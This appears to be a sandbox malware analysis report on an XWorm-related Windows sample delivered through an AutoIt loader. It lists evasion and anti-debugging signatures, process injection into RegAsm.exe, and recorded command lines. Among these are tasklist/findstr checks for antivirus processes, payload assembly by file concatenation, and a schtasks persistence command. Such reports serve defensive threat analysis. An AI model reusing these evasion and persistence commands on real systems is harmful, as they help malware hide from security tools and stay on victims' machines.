Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Memory allocated: 14E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Memory allocated: 2FC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Memory allocated: 2F00000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Window / User API: threadDelayed 1826 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Window / User API: threadDelayed 713 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Window / User API: threadDelayed 9107 Jump to behavior
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr API coverage: 4.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe TID: 6656 Thread sleep time: -35048813740048126s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Thread sleep count: Count: 1826 delay: -10 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00EA4005
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA494A GetFileAttributesW,FindFirstFileW,FindClose, 10_2_00EA494A
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00EA3CE2
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_00EAC2FF
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EACD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 10_2_00EACD9F
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EACD14 FindFirstFileW,FindClose, 10_2_00EACD14
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00EAF5D8
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00EAF735
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_00EAFA36
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00354005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_00354005
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 18_2_0035C2FF
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035494A GetFileAttributesW,FindFirstFileW,FindClose, 18_2_0035494A
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035CD14 FindFirstFileW,FindClose, 18_2_0035CD14
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 18_2_0035CD9F
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_0035F5D8
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_0035F735
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 18_2_0035FA36
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00353CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_00353CE2
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E55D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 10_2_00E55D13
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\438799 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\438799\ Jump to behavior
Source: RegAsm.exe, 00000017.00000002.2975642601.0000000006780000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll["
Source: RegAsm.exe, 00000017.00000002.2972830964.00000000012E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VmCi-
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process information queried: ProcessInformation Jump to behavior
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EB45D5 BlockInput, 10_2_00EB45D5
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E55240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 10_2_00E55240
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E75CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 10_2_00E75CAC
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E988CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 10_2_00E988CD
Enables debug privileges
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00E6A385
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6A354 SetUnhandledExceptionFilter, 10_2_00E6A354
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0031A354 SetUnhandledExceptionFilter, 18_2_0031A354
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0031A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_0031A385
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Memory written: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe base: 1030000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Memory written: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe base: 1030000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Memory written: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe base: F7D000 Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E99369 LogonUserW, 10_2_00E99369
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E55240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 10_2_00E55240
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA1AC6 SendInput,keybd_event, 10_2_00EA1AC6
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA51E2 mouse_event, 10_2_00EA51E2
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 438799 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "pantyhoseyourslandscapesdisposition" Flyer Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity L Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Dump.pif L Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process created: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E988CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 10_2_00E988CD
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 10_2_00EA4F1C
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028DD000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1753045770.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000000.1744374381.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q(
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managert-^q
Source: Dump.pif, ImageSyncProX.scr Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000003030000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000003042000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6885B cpuid 10_2_00E6885B
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E80030 GetLocalTime,__swprintf, 10_2_00E80030
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E80722 GetUserNameW, 10_2_00E80722
